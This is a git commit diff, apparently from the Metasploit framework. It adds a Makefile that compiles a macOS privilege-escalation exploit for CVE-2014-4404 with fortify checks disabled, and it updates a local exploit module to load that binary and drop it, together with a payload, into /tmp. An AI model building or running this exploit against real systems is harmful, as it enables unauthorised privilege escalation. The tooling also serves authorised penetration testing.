Change paths, add makefile and compile
parent
b6306ef7a2
commit
7772da5e3f
Binary file not shown.
|
@ -0,0 +1,11 @@
|
||||||
|
all: key_exploit
|
||||||
|
|
||||||
|
key_exploit: key_exploit.c
|
||||||
|
clang -o key_exploit key_exploit.c -framework CoreFoundation -framework IOKit -g -D_FORTIFY_SOURCE=0
|
||||||
|
|
||||||
|
install: key_exploit
|
||||||
|
install -m 755 key_exploit ../../../../data/exploits/CVE-2014-4404
|
||||||
|
|
||||||
|
clean:
|
||||||
|
rm -rf key_exploit
|
||||||
|
rm -rf key_exploit.dSYM
|
|
@ -60,8 +60,8 @@ class Metasploit3 < Msf::Exploit::Local
|
||||||
end
|
end
|
||||||
|
|
||||||
def exploit
|
def exploit
|
||||||
osx_path = File.join(Msf::Config.install_root, 'data', 'exploits', 'osx')
|
exploit_path = File.join(Msf::Config.install_root, 'data', 'exploits', 'CVE-2014-4404')
|
||||||
binary_exploit = File.read(File.join(osx_path, 'key_exploit.bin'))
|
binary_exploit = File.read(File.join(exploit_path, 'key_exploit'))
|
||||||
binary_payload = Msf::Util::EXE.to_osx_x64_macho(framework, payload.encoded)
|
binary_payload = Msf::Util::EXE.to_osx_x64_macho(framework, payload.encoded)
|
||||||
exploit_file = "/tmp/#{Rex::Text::rand_text_alpha_lower(12)}"
|
exploit_file = "/tmp/#{Rex::Text::rand_text_alpha_lower(12)}"
|
||||||
payload_file = "/tmp/#{Rex::Text::rand_text_alpha_lower(12)}"
|
payload_file = "/tmp/#{Rex::Text::rand_text_alpha_lower(12)}"
|
||||||
|
|
Loading…
Reference in New Issue